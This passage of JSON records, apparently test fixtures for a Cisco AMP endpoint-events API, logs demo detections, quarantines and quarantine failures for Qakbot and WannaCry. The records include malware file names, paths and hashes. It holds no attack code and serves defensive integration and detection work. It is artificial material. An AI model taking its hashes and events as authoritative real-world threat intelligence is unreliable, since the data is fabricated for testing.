seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} 